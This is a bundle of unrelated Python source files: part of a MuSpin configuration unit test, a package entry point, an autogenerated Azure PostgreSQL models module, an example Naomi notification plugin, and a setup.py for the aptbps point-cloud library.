        # Same, but for mode zxz
        stest = StringIO("orientation zxz\n" + ablock)
        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate())

        for ((a, b, c), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
            q2 = Quaternion.from_axis_angle([0, 0, 1], c)
            q2 *= Quaternion.from_axis_angle([1, 0, 0], b)
            q2 *= Quaternion.from_axis_angle([0, 0, 1], a)
            q2 = q2.conjugate()
            self.assertTrue(np.isclose(q1.q, q2.q).all())

        # Same, but for theta and phi angles alone: two-angle rows are
        # interpreted as (theta, phi) with the phi rotation applied twice.
        angles = np.array(np.meshgrid(*[rng, rng])).reshape((2, -1)).T
        ablock = "\n".join(map(lambda x: "\t{0} {1}".format(*x), angles))

        stest = StringIO("orientation\n" + ablock)
        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate())

        for ((theta, phi), (q1, w)) in zip(angles, cfg._avg_ranges["orient"]):
            q2 = Quaternion.from_axis_angle([0, 0, 1], phi)
            q2 *= Quaternion.from_axis_angle([0, 1, 0], theta)
            q2 *= Quaternion.from_axis_angle([0, 0, 1], phi)
            q2 = q2.conjugate()
            self.assertTrue(np.isclose(q1.q, q2.q).all())

    def test_fitting(self):
        # Special tests for fitting tasks
        stest = StringIO(
            """
fitting_variables
    x
fitting_data
    0 0.5
    1 0.2
"""
        )

        itest = MuSpinInput(stest)
        cfg = MuSpinConfig(itest.evaluate(x=0.0))

        # Check that the time axis has been overridden
        self.assertTrue((np.array(cfg._x_range["t"]) == [0, 1]).all())

        # Should fail due to file_ranges: fitting is incompatible with a
        # non-averaged orientation range producing multiple output files.
        stest = StringIO(
            """
fitting_variables
    x
fitting_data
    0 0.5
    1 0.2
average_axes
    none
orientation
    0 0
    0 1
"""
        )

        itest = MuSpinInput(stest)

        with self.assertRaises(MuSpinConfigError):
            cfg = MuSpinConfig(itest.evaluate(x=0.0))
# Package entry point: delegate to the study manager's CLI.
from .study_manager import main

# Guard the call so importing this module (rather than executing it with
# `python -m <package>`) no longer triggers a full run as a side effect.
if __name__ == "__main__":
    main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .proxy_resource import ProxyResource
from .tracked_resource import TrackedResource
from .server_properties_for_create import ServerPropertiesForCreate
from .server_properties_for_default_create import ServerPropertiesForDefaultCreate
from .server_properties_for_restore import ServerPropertiesForRestore
from .sku import Sku
from .server import Server
from .server_for_create import ServerForCreate
from .server_update_parameters import ServerUpdateParameters
from .firewall_rule import FirewallRule
from .database import Database
from .configuration import Configuration
from .operation_display import OperationDisplay
from .operation import Operation
from .operation_list_result import OperationListResult
from .log_file import LogFile
from .server_paged import ServerPaged
from .firewall_rule_paged import FirewallRulePaged
from .database_paged import DatabasePaged
from .configuration_paged import ConfigurationPaged
from .log_file_paged import LogFilePaged
from .postgre_sql_management_client_enums import (
ServerVersion,
SslEnforcementEnum,
ServerState,
SkuTier,
OperationOrigin,
)
# Public API of this models subpackage. This file is autogenerated by
# AutoRest (see header above); manual edits will be lost on regeneration.
__all__ = [
    'ProxyResource',
    'TrackedResource',
    'ServerPropertiesForCreate',
    'ServerPropertiesForDefaultCreate',
    'ServerPropertiesForRestore',
    'Sku',
    'Server',
    'ServerForCreate',
    'ServerUpdateParameters',
    'FirewallRule',
    'Database',
    'Configuration',
    'OperationDisplay',
    'Operation',
    'OperationListResult',
    'LogFile',
    'ServerPaged',
    'FirewallRulePaged',
    'DatabasePaged',
    'ConfigurationPaged',
    'LogFilePaged',
    'ServerVersion',
    'SslEnforcementEnum',
    'ServerState',
    'SkuTier',
    'OperationOrigin',
]
|
# -*- coding: utf-8 -*-
from datetime import datetime
from naomi import app_utils
from naomi import plugin
# The Notification Client Plugin contains a method called
# "gather()" that runs every 30 seconds. If the plugin
# does not have a gather() method at the end of the __init__
# method, then it will not be added to the notifier and
# will not run again until Naomi is restarted.
# The base notification client has the following properties:
# self._mic - the current microphone
# self._brain - the current brain
# self.gettext - the current translator
class MyNotificationClient(plugin.NotificationClientPlugin):
    """Example notification client that announces when it last ran.

    ``gather()`` is the hook the notifier fires periodically (roughly every
    30 seconds, per the framework notes above); it speaks a status message
    and returns a timezone-aware timestamp, which the framework hands back
    as ``last_date`` on the next invocation.
    """

    def gather(self, last_date):
        # First invocation has no previous timestamp to report.
        message = (
            "First run"
            if last_date is None
            else "Last run at {}".format(last_date)
        )
        self._mic.say(message)
        # Aware timestamp in the app's configured timezone; stored by the
        # framework and passed back in next time.
        return datetime.now(tz=app_utils.get_timezone())
|
from setuptools import setup

# Read the README so PyPI renders it as the project description page.
# Explicit encoding avoids decode errors on platforms with a non-UTF-8
# default locale.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setup(
    name="aptbps",
    # Version must be a string; setuptools deprecates non-string versions
    # (the float 1.0 previously passed here).
    version="1.0",
    description="Density-adaptive distance encoding for machine learning on point clouds",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/rdimaio/aptbps",
    # NOTE: the "sklearn" distribution on PyPI is deprecated and now fails
    # to install; the correct distribution name is "scikit-learn".
    setup_requires=["numpy", "scikit-learn", "tqdm", "scipy", "KDEpy"],
    install_requires=[
        "scikit-learn",
        "tqdm",
        "numpy",
        "scipy",
        "KDEpy",
    ],
    author="Riccardo Di Maio",
    license="MIT",
    keywords="aptbps",
    author_email="riccardodimaio11@gmail.com",
    packages=["aptbps"],
)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.